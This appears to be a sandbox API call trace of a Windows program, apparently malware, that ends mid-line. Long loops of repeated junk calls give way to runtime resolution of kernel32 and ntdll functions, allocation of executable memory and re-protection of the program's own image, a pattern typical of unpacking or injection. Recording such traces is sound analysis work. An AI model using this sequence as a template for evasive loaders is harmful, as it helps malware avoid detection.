[0154.546] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.547] GetKeyState (nVirtKey=1) returned 0 [0154.547] GetStretchBltMode (hdc=0x1) returned 0 [0154.547] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.547] GetKeyState (nVirtKey=1) returned 0 [0154.547] GetStretchBltMode (hdc=0x1) returned 0 [0154.547] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.547] GetKeyState (nVirtKey=1) returned 0 [0154.547] GetStretchBltMode (hdc=0x1) returned 0 [0154.547] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.547] GetKeyState (nVirtKey=1) returned 0 [0154.547] GetStretchBltMode (hdc=0x1) returned 0 [0154.547] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.547] GetKeyState (nVirtKey=1) returned 0 [0154.547] GetStretchBltMode (hdc=0x1) returned 0 [0154.547] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.547] GetKeyState (nVirtKey=1) returned 0 [0154.547] GetStretchBltMode (hdc=0x1) returned 0 [0154.547] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.547] GetKeyState (nVirtKey=1) returned 0 [0154.547] GetStretchBltMode (hdc=0x1) returned 0 [0154.547] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.547] GetKeyState (nVirtKey=1) returned 0 [0154.547] GetStretchBltMode (hdc=0x1) returned 0 [0154.547] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.547] GetKeyState (nVirtKey=1) returned 0 [0154.547] GetStretchBltMode (hdc=0x1) returned 0 [0154.547] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.548] GetKeyState (nVirtKey=1) returned 0 [0154.548] GetStretchBltMode (hdc=0x1) returned 0 [0154.548] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.548] GetKeyState (nVirtKey=1) returned 0 [0154.548] GetStretchBltMode (hdc=0x1) returned 0 [0154.548] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.548] GetKeyState (nVirtKey=1) returned 0 [0154.548] GetStretchBltMode (hdc=0x1) returned 0 [0154.548] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.548] GetKeyState (nVirtKey=1) returned 0 [0154.548] GetStretchBltMode (hdc=0x1) returned 0 [0154.548] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.548] GetKeyState (nVirtKey=1) returned 0 [0154.548] GetStretchBltMode (hdc=0x1) returned 0 [0154.548] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.548] GetKeyState (nVirtKey=1) returned 0 [0154.548] GetStretchBltMode (hdc=0x1) returned 0 [0154.548] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.548] GetKeyState (nVirtKey=1) returned 0 [0154.548] GetStretchBltMode (hdc=0x1) returned 0 [0154.548] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.548] GetKeyState (nVirtKey=1) returned 0 [0154.548] GetStretchBltMode (hdc=0x1) returned 0 [0154.548] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.548] GetKeyState (nVirtKey=1) returned 0 [0154.548] GetStretchBltMode (hdc=0x1) returned 0 [0154.549] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.549] GetKeyState (nVirtKey=1) returned 0 [0154.549] GetStretchBltMode (hdc=0x1) returned 0 [0154.549] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.549] GetKeyState (nVirtKey=1) returned 0 [0154.549] GetStretchBltMode (hdc=0x1) returned 0 [0154.549] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.549] GetKeyState (nVirtKey=1) returned 0 [0154.549] GetStretchBltMode (hdc=0x1) returned 0 [0154.549] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.549] GetKeyState (nVirtKey=1) returned 0 [0154.549] GetStretchBltMode (hdc=0x1) returned 0 [0154.549] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.549] GetKeyState (nVirtKey=1) returned 0 [0154.549] GetStretchBltMode (hdc=0x1) returned 0 [0154.549] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.549] GetKeyState (nVirtKey=1) returned 0 [0154.549] GetStretchBltMode (hdc=0x1) returned 0 [0154.549] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.549] GetKeyState (nVirtKey=1) returned 0 [0154.549] GetStretchBltMode (hdc=0x1) returned 0 [0154.549] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.549] GetKeyState (nVirtKey=1) returned 0 [0154.549] GetStretchBltMode (hdc=0x1) returned 0 [0154.549] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.549] GetKeyState (nVirtKey=1) returned 0 [0154.549] GetStretchBltMode (hdc=0x1) returned 0 [0154.549] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.550] GetKeyState (nVirtKey=1) returned 0 [0154.550] GetStretchBltMode (hdc=0x1) returned 0 [0154.550] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.550] GetKeyState (nVirtKey=1) returned 0 [0154.550] GetStretchBltMode (hdc=0x1) returned 0 [0154.550] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.550] GetKeyState (nVirtKey=1) returned 0 [0154.550] GetStretchBltMode (hdc=0x1) returned 0 [0154.550] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.550] GetKeyState (nVirtKey=1) returned 0 [0154.550] GetStretchBltMode (hdc=0x1) returned 0 [0154.550] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.550] GetKeyState (nVirtKey=1) returned 0 [0154.550] GetStretchBltMode (hdc=0x1) returned 0 [0154.550] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.550] GetKeyState (nVirtKey=1) returned 0 [0154.550] GetStretchBltMode (hdc=0x1) returned 0 [0154.550] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.550] GetKeyState (nVirtKey=1) returned 0 [0154.550] GetStretchBltMode (hdc=0x1) returned 0 [0154.550] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.550] GetKeyState (nVirtKey=1) returned 0 [0154.550] GetStretchBltMode (hdc=0x1) returned 0 [0154.550] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.550] GetKeyState (nVirtKey=1) returned 0 [0154.550] GetStretchBltMode (hdc=0x1) returned 0 [0154.550] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.550] GetKeyState (nVirtKey=1) returned 0 [0154.551] GetStretchBltMode (hdc=0x1) returned 0 [0154.551] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.551] GetKeyState (nVirtKey=1) returned 0 [0154.551] GetStretchBltMode (hdc=0x1) returned 0 [0154.551] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.551] GetKeyState (nVirtKey=1) returned 0 [0154.551] GetStretchBltMode (hdc=0x1) returned 0 [0154.551] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.551] GetKeyState (nVirtKey=1) returned 0 [0154.551] GetStretchBltMode (hdc=0x1) returned 0 [0154.551] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.551] GetKeyState (nVirtKey=1) returned 0 [0154.551] GetStretchBltMode (hdc=0x1) returned 0 [0154.551] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.551] GetKeyState (nVirtKey=1) returned 0 [0154.551] GetStretchBltMode (hdc=0x1) returned 0 [0154.551] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.551] GetKeyState (nVirtKey=1) returned 0 [0154.551] GetStretchBltMode (hdc=0x1) returned 0 [0154.551] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.551] GetKeyState (nVirtKey=1) returned 0 [0154.551] GetStretchBltMode (hdc=0x1) returned 0 [0154.551] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.551] GetKeyState (nVirtKey=1) returned 0 [0154.551] GetStretchBltMode (hdc=0x1) returned 0 [0154.551] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.551] GetKeyState (nVirtKey=1) returned 0 [0154.551] GetStretchBltMode (hdc=0x1) returned 0 [0154.552] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.552] GetKeyState (nVirtKey=1) returned 0 [0154.552] GetStretchBltMode (hdc=0x1) returned 0 [0154.552] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.552] GetKeyState (nVirtKey=1) returned 0 [0154.552] GetStretchBltMode (hdc=0x1) returned 0 [0154.552] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.552] GetKeyState (nVirtKey=1) returned 0 [0154.552] GetStretchBltMode (hdc=0x1) returned 0 [0154.552] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.552] GetKeyState (nVirtKey=1) returned 0 [0154.552] GetStretchBltMode (hdc=0x1) returned 0 [0154.552] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.552] GetKeyState (nVirtKey=1) returned 0 [0154.552] GetStretchBltMode (hdc=0x1) returned 0 [0154.552] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.552] GetKeyState (nVirtKey=1) returned 0 [0154.552] GetStretchBltMode (hdc=0x1) returned 0 [0154.552] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.552] GetKeyState (nVirtKey=1) returned 0 [0154.552] GetStretchBltMode (hdc=0x1) returned 0 [0154.552] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.552] GetKeyState (nVirtKey=1) returned 0 [0154.552] GetStretchBltMode (hdc=0x1) returned 0 [0154.552] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.552] GetKeyState (nVirtKey=1) returned 0 [0154.553] GetStretchBltMode (hdc=0x1) returned 0 [0154.553] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.553] GetKeyState (nVirtKey=1) returned 0 [0154.553] GetStretchBltMode (hdc=0x1) returned 0 [0154.553] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.553] GetKeyState (nVirtKey=1) returned 0 [0154.553] GetStretchBltMode (hdc=0x1) returned 0 [0154.553] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.553] GetKeyState (nVirtKey=1) returned 0 [0154.553] GetStretchBltMode (hdc=0x1) returned 0 [0154.553] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.553] GetKeyState (nVirtKey=1) returned 0 [0154.553] GetStretchBltMode (hdc=0x1) returned 0 [0154.553] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.553] GetKeyState (nVirtKey=1) returned 0 [0154.553] GetStretchBltMode (hdc=0x1) returned 0 [0154.553] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.553] GetKeyState (nVirtKey=1) returned 0 [0154.553] GetStretchBltMode (hdc=0x1) returned 0 [0154.553] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.554] GetKeyState (nVirtKey=1) returned 0 [0154.554] GetStretchBltMode (hdc=0x1) returned 0 [0154.554] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.554] GetKeyState (nVirtKey=1) returned 0 [0154.554] GetStretchBltMode (hdc=0x1) returned 0 [0154.554] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.554] GetKeyState (nVirtKey=1) returned 0 [0154.554] GetStretchBltMode (hdc=0x1) returned 0 [0154.554] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.554] GetKeyState (nVirtKey=1) returned 0 [0154.554] GetStretchBltMode (hdc=0x1) returned 0 [0154.554] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.554] GetKeyState (nVirtKey=1) returned 0 [0154.554] GetStretchBltMode (hdc=0x1) returned 0 [0154.554] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.554] GetKeyState (nVirtKey=1) returned 0 [0154.554] GetStretchBltMode (hdc=0x1) returned 0 [0154.554] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.554] GetKeyState (nVirtKey=1) returned 0 [0154.554] GetStretchBltMode (hdc=0x1) returned 0 [0154.554] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.554] GetKeyState (nVirtKey=1) returned 0 [0154.554] GetStretchBltMode (hdc=0x1) returned 0 [0154.554] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.554] GetKeyState (nVirtKey=1) returned 0 [0154.555] GetStretchBltMode (hdc=0x1) returned 0 [0154.555] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.555] GetKeyState (nVirtKey=1) returned 0 [0154.555] GetStretchBltMode (hdc=0x1) returned 0 [0154.555] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.555] GetKeyState (nVirtKey=1) returned 0 [0154.555] GetStretchBltMode (hdc=0x1) returned 0 [0154.555] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.555] GetKeyState (nVirtKey=1) returned 0 [0154.555] GetStretchBltMode (hdc=0x1) returned 0 [0154.555] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.555] GetKeyState (nVirtKey=1) returned 0 [0154.555] GetStretchBltMode (hdc=0x1) returned 0 [0154.555] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.555] GetKeyState (nVirtKey=1) returned 0 [0154.555] GetStretchBltMode (hdc=0x1) returned 0 [0154.555] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.555] GetKeyState (nVirtKey=1) returned 0 [0154.555] GetStretchBltMode (hdc=0x1) returned 0 [0154.555] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.555] GetKeyState (nVirtKey=1) returned 0 [0154.555] GetStretchBltMode (hdc=0x1) returned 0 [0154.555] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.555] GetKeyState (nVirtKey=1) returned 0 [0154.555] GetStretchBltMode (hdc=0x1) returned 0 [0154.555] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.556] GetKeyState (nVirtKey=1) returned 0 [0154.556] GetStretchBltMode (hdc=0x1) returned 0 [0154.556] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.556] GetKeyState (nVirtKey=1) returned 0 [0154.556] GetStretchBltMode (hdc=0x1) returned 0 [0154.556] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.556] GetKeyState (nVirtKey=1) returned 0 [0154.556] GetStretchBltMode (hdc=0x1) returned 0 [0154.556] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.556] GetKeyState (nVirtKey=1) returned 0 [0154.556] GetStretchBltMode (hdc=0x1) returned 0 [0154.556] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.556] GetKeyState (nVirtKey=1) returned 0 [0154.556] GetStretchBltMode (hdc=0x1) returned 0 [0154.556] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.556] GetKeyState (nVirtKey=1) returned 0 [0154.556] GetStretchBltMode (hdc=0x1) returned 0 [0154.556] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.556] GetKeyState (nVirtKey=1) returned 0 [0154.556] GetStretchBltMode (hdc=0x1) returned 0 [0154.556] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.556] GetKeyState (nVirtKey=1) returned 0 [0154.556] GetStretchBltMode (hdc=0x1) returned 0 [0154.556] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.556] GetKeyState (nVirtKey=1) returned 0 [0154.557] GetStretchBltMode (hdc=0x1) returned 0 [0154.557] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.557] GetKeyState (nVirtKey=1) returned 0 [0154.557] GetStretchBltMode (hdc=0x1) returned 0 [0154.557] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.557] GetKeyState (nVirtKey=1) returned 0 [0154.557] GetStretchBltMode (hdc=0x1) returned 0 [0154.557] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.557] GetKeyState (nVirtKey=1) returned 0 [0154.557] GetStretchBltMode (hdc=0x1) returned 0 [0154.557] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.557] GetKeyState (nVirtKey=1) returned 0 [0154.557] GetStretchBltMode (hdc=0x1) returned 0 [0154.557] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.557] GetKeyState (nVirtKey=1) returned 0 [0154.557] GetStretchBltMode (hdc=0x1) returned 0 [0154.557] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.557] GetKeyState (nVirtKey=1) returned 0 [0154.557] GetStretchBltMode (hdc=0x1) returned 0 [0154.557] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.557] GetKeyState (nVirtKey=1) returned 0 [0154.557] GetStretchBltMode (hdc=0x1) returned 0 [0154.557] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.557] GetKeyState (nVirtKey=1) returned 0 [0154.557] GetStretchBltMode (hdc=0x1) returned 0 [0154.557] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.558] GetKeyState (nVirtKey=1) returned 0 [0154.558] GetStretchBltMode (hdc=0x1) returned 0 [0154.616] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.616] GetKeyState (nVirtKey=1) returned 0 [0154.616] GetStretchBltMode (hdc=0x1) returned 0 [0154.616] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.616] GetKeyState (nVirtKey=1) returned 0 [0154.616] GetStretchBltMode (hdc=0x1) returned 0 [0154.616] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.616] GetKeyState (nVirtKey=1) returned 0 [0154.616] GetStretchBltMode (hdc=0x1) returned 0 [0154.617] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.617] GetKeyState (nVirtKey=1) returned 0 [0154.617] GetStretchBltMode (hdc=0x1) returned 0 [0154.617] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.617] GetKeyState (nVirtKey=1) returned 0 [0154.617] GetStretchBltMode (hdc=0x1) returned 0 [0154.617] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.617] GetKeyState (nVirtKey=1) returned 0 [0154.617] GetStretchBltMode (hdc=0x1) returned 0 [0154.617] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.617] GetKeyState (nVirtKey=1) returned 0 [0154.617] GetStretchBltMode (hdc=0x1) returned 0 [0154.617] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.617] GetKeyState (nVirtKey=1) returned 0 [0154.617] GetStretchBltMode (hdc=0x1) returned 0 [0154.617] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.617] GetKeyState (nVirtKey=1) returned 0 [0154.617] GetStretchBltMode (hdc=0x1) returned 0 [0154.617] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.617] GetKeyState (nVirtKey=1) returned 0 [0154.617] GetStretchBltMode (hdc=0x1) returned 0 [0154.617] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.617] GetKeyState (nVirtKey=1) returned 0 [0154.617] GetStretchBltMode (hdc=0x1) returned 0 [0154.617] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.617] GetKeyState (nVirtKey=1) returned 0 [0154.617] GetStretchBltMode (hdc=0x1) returned 0 [0154.617] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.617] GetKeyState (nVirtKey=1) returned 0 [0154.618] GetStretchBltMode (hdc=0x1) returned 0 [0154.618] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.618] GetKeyState (nVirtKey=1) returned 0 [0154.618] GetStretchBltMode (hdc=0x1) returned 0 [0154.618] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.618] GetKeyState (nVirtKey=1) returned 0 [0154.618] GetStretchBltMode (hdc=0x1) returned 0 [0154.618] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.618] GetKeyState (nVirtKey=1) returned 0 [0154.618] GetStretchBltMode (hdc=0x1) returned 0 [0154.618] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.618] GetKeyState (nVirtKey=1) returned 0 [0154.618] GetStretchBltMode (hdc=0x1) returned 0 [0154.618] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.618] GetKeyState (nVirtKey=1) returned 0 [0154.618] GetStretchBltMode (hdc=0x1) returned 0 [0154.618] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.618] GetKeyState (nVirtKey=1) returned 0 [0154.618] GetStretchBltMode (hdc=0x1) returned 0 [0154.618] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.618] GetKeyState (nVirtKey=1) returned 0 [0154.618] GetStretchBltMode (hdc=0x1) returned 0 [0154.618] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.618] GetKeyState (nVirtKey=1) returned 0 [0154.618] GetStretchBltMode (hdc=0x1) returned 0 [0154.618] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.618] GetKeyState (nVirtKey=1) returned 0 [0154.618] GetStretchBltMode (hdc=0x1) returned 0 [0154.619] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.619] GetKeyState (nVirtKey=1) returned 0 [0154.619] GetStretchBltMode (hdc=0x1) returned 0 [0154.619] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.619] GetKeyState (nVirtKey=1) returned 0 [0154.619] GetStretchBltMode (hdc=0x1) returned 0 [0154.619] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.619] GetKeyState (nVirtKey=1) returned 0 [0154.619] GetStretchBltMode (hdc=0x1) returned 0 [0154.619] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.619] GetKeyState (nVirtKey=1) returned 0 [0154.619] GetStretchBltMode (hdc=0x1) returned 0 [0154.619] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.619] GetKeyState (nVirtKey=1) returned 0 [0154.619] GetStretchBltMode (hdc=0x1) returned 0 [0154.619] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.619] GetKeyState (nVirtKey=1) returned 0 [0154.619] GetStretchBltMode (hdc=0x1) returned 0 [0154.619] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.619] GetKeyState (nVirtKey=1) returned 0 [0154.619] GetStretchBltMode (hdc=0x1) returned 0 [0154.619] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.619] GetKeyState (nVirtKey=1) returned 0 [0154.619] GetStretchBltMode (hdc=0x1) returned 0 [0154.619] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.620] GetKeyState (nVirtKey=1) returned 0 [0154.620] GetStretchBltMode (hdc=0x1) returned 0 [0154.620] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.620] GetKeyState (nVirtKey=1) returned 0 [0154.620] GetStretchBltMode (hdc=0x1) returned 0 [0154.620] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.620] GetKeyState (nVirtKey=1) returned 0 [0154.620] GetStretchBltMode (hdc=0x1) returned 0 [0154.620] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.620] GetKeyState (nVirtKey=1) returned 0 [0154.620] GetStretchBltMode (hdc=0x1) returned 0 [0154.620] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.620] GetKeyState (nVirtKey=1) returned 0 [0154.620] GetStretchBltMode (hdc=0x1) returned 0 [0154.620] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.620] GetKeyState (nVirtKey=1) returned 0 [0154.620] GetStretchBltMode (hdc=0x1) returned 0 [0154.620] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.620] GetKeyState (nVirtKey=1) returned 0 [0154.620] GetStretchBltMode (hdc=0x1) returned 0 [0154.621] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.621] GetKeyState (nVirtKey=1) returned 0 [0154.621] GetStretchBltMode (hdc=0x1) returned 0 [0154.621] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.621] GetKeyState (nVirtKey=1) returned 0 [0154.621] GetStretchBltMode (hdc=0x1) returned 0 [0154.621] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.621] GetKeyState (nVirtKey=1) returned 0 [0154.621] GetStretchBltMode (hdc=0x1) returned 0 [0154.621] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.621] GetKeyState (nVirtKey=1) returned 0 [0154.621] GetStretchBltMode (hdc=0x1) returned 0 [0154.621] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.621] GetKeyState (nVirtKey=1) returned 0 [0154.621] GetStretchBltMode (hdc=0x1) returned 0 [0154.621] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.621] GetKeyState (nVirtKey=1) returned 0 [0154.621] GetStretchBltMode (hdc=0x1) returned 0 [0154.621] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.621] GetKeyState (nVirtKey=1) returned 0 [0154.621] GetStretchBltMode (hdc=0x1) returned 0 [0154.621] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.621] GetKeyState (nVirtKey=1) returned 0 [0154.621] GetStretchBltMode (hdc=0x1) returned 0 [0154.621] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.621] GetKeyState (nVirtKey=1) returned 0 [0154.622] GetStretchBltMode (hdc=0x1) returned 0 [0154.622] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.622] GetKeyState (nVirtKey=1) returned 0 [0154.622] GetStretchBltMode (hdc=0x1) returned 0 [0154.622] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.622] GetKeyState (nVirtKey=1) returned 0 [0154.622] GetStretchBltMode (hdc=0x1) returned 0 [0154.622] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.622] GetKeyState (nVirtKey=1) returned 0 [0154.622] GetStretchBltMode (hdc=0x1) returned 0 [0154.622] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.622] GetKeyState (nVirtKey=1) returned 0 [0154.622] GetStretchBltMode (hdc=0x1) returned 0 [0154.622] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.622] GetKeyState (nVirtKey=1) returned 0 [0154.622] GetStretchBltMode (hdc=0x1) returned 0 [0154.622] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.622] GetKeyState (nVirtKey=1) returned 0 [0154.622] GetStretchBltMode (hdc=0x1) returned 0 [0154.622] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.622] GetKeyState (nVirtKey=1) returned 0 [0154.622] GetStretchBltMode (hdc=0x1) returned 0 [0154.622] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.622] GetKeyState (nVirtKey=1) returned 0 [0154.623] GetStretchBltMode (hdc=0x1) returned 0 [0154.623] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.623] GetKeyState (nVirtKey=1) returned 0 [0154.623] GetStretchBltMode (hdc=0x1) returned 0 [0154.623] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.623] GetKeyState (nVirtKey=1) returned 0 [0154.623] GetStretchBltMode (hdc=0x1) returned 0 [0154.623] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.623] GetKeyState (nVirtKey=1) returned 0 [0154.623] GetStretchBltMode (hdc=0x1) returned 0 [0154.623] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.623] GetKeyState (nVirtKey=1) returned 0 [0154.623] GetStretchBltMode (hdc=0x1) returned 0 [0154.623] GetListBoxInfo (hwnd=0x0) returned 0x0 [0155.256] GetProcAddress (hModule=0x74bc0000, lpProcName="LoadLibraryExA") returned 0x74ca6040 [0155.257] LoadLibraryExA (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x772d0000 [0155.257] GetProcAddress (hModule=0x772d0000, lpProcName="GetProcAddress") returned 0x772e51b0 [0155.258] GetProcAddress (hModule=0x772d0000, lpProcName="VirtualAlloc") returned 0x772e6970 [0155.258] GetProcAddress (hModule=0x772d0000, lpProcName="VirtualFree") returned 0x772e69d0 [0155.258] GetProcAddress (hModule=0x772d0000, lpProcName="UnmapViewOfFile") returned 0x772e68f0 [0155.259] GetProcAddress (hModule=0x772d0000, lpProcName="VirtualProtect") returned 0x772e6a30 [0155.259] GetProcAddress (hModule=0x772d0000, lpProcName="LoadLibraryExA") returned 0x772e5aa0 [0155.259] GetProcAddress (hModule=0x772d0000, lpProcName="GetModuleHandleA") returned 0x772e50b0 [0155.259] GetProcAddress (hModule=0x772d0000, lpProcName="GetModuleHandleW") returned 0x772e50d0 [0155.259] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileA") returned 0x7733ed00 [0155.259] GetProcAddress (hModule=0x772d0000, lpProcName="SetFilePointer") returned 0x7733f120 [0155.259] GetProcAddress (hModule=0x772d0000, lpProcName="WriteFile") returned 0x7733f180 [0155.259] GetProcAddress (hModule=0x772d0000, lpProcName="CloseHandle") returned 0x7733eab0 [0155.260] GetProcAddress (hModule=0x772d0000, lpProcName="GetTempPathA") returned 0x7733efe0 [0155.260] GetProcAddress (hModule=0x772d0000, lpProcName="lstrlenA") returned 0x772e6c50 [0155.260] GetProcAddress (hModule=0x772d0000, lpProcName="lstrcatA") returned 0x773270c0 [0155.260] GetProcAddress (hModule=0x772d0000, lpProcName="FreeLibrary") returned 0x772e4c40 [0155.260] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0155.260] GetProcAddress (hModule=0x74bc0000, lpProcName="VirtualAlloc") returned 0x74cb54c0 [0155.260] VirtualAlloc (lpAddress=0x0, dwSize=0xe200, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0155.284] VirtualProtect (in: lpAddress=0x400000, dwSize=0x11000, flNewProtect=0x40, lpflOldProtect=0x19fbc4 | out: lpflOldProtect=0x19fbc4*=0x2) returned 1 [0155.289] LoadLibraryExA (lpLibFileName="ntdll.dll", hFile=0x0, dwFlags=0x0) returned 0x77970000 [0155.290] GetProcAddress (hModule=0x77970000, lpProcName="NtClose") returned 0x779e1de0 [0155.290] GetProcAddress (hModule=0x77970000, lpProcName="NtCreateFile") returned 0x779e2260 [0155.290] GetProcAddress (hModule=0x77970000, lpProcName="RtlInitUnicodeString") returned 0x779e42f0 [0155.290] GetProcAddress (hModule=0x77970000, lpProcName="NtMapViewOfSection") returned 